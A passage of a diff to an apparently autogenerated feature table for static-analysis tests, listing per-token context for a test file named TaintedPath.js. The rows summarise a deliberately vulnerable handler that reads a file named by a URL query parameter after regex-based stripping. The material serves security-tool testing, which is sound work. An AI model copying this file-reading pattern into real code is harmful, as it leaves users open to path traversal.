autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | functio ... bove.\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | functio ... bove.\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | functio ... bove.\\n} | calleeImports | http | @@ -5673,6 +62282,86 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | functio ... bove.\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | functio ... bove.\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | functio ... bove.\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:32:133:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:41:122:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:46:122:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:10 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:7:123:48 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:16 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:16 | url | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:16 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:22 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:22 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:37 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:43 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:43 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:48 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:14:123:48 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:18:123:22 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:18:123:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:18:123:22 | parse | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:18:123:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:18:123:22 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:24:123:26 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:24:123:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:24:123:26 | req | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:24:123:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:24:123:26 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:123:24:123:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:123:24:123:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:123:24:123:30 | req.url | calleeImports | url | @@ -5682,6 +62371,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:123:24:123:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:123:24:123:30 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:123:24:123:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:123:28:123:30 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:28:123:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:28:123:30 | url | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:28:123:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:28:123:30 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:123:33:123:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:123:33:123:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:123:33:123:36 | true | calleeImports | url | @@ -5691,11 +62385,76 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:123:33:123:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:123:33:123:36 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:123:33:123:36 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:123:39:123:43 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:39:123:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:39:123:43 | query | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:39:123:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:39:123:43 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:123:45:123:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:45:123:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:123:45:123:48 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:123:45:123:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:123:45:123:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:125:7:125:11 | !path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:125:7:125:11 | !path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:125:7:125:11 | !path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:125:7:125:11 | !path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:125:7:125:11 | !path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:125:8:125:11 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:7 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:7 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:7 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:7 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:7 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path = ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path = ... /g, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path = ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path = ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:128:4:128:50 | path = ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:14 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:14 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:14 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:14 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:14 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:22 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:22 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:22 | path.replace | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:22 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:22 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | path.re ... /g, '') | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | | autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:128:16:128:22 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:16:128:22 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:128:16:128:22 | replace | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:128:16:128:22 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:128:16:128:22 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:128:24:128:45 | /[\\]\\[* ... \\?\\/]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:128:24:128:45 | /[\\]\\[* ... \\?\\/]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:128:24:128:45 | /[\\]\\[* ... \\?\\/]/g | calleeImports | url | @@ -5714,11 +62473,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:128:48:128:49 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:128:48:128:49 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:128:48:128:49 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:8 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:8 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:8 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:8 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:8 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path = ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path = ... /g, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path = ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace 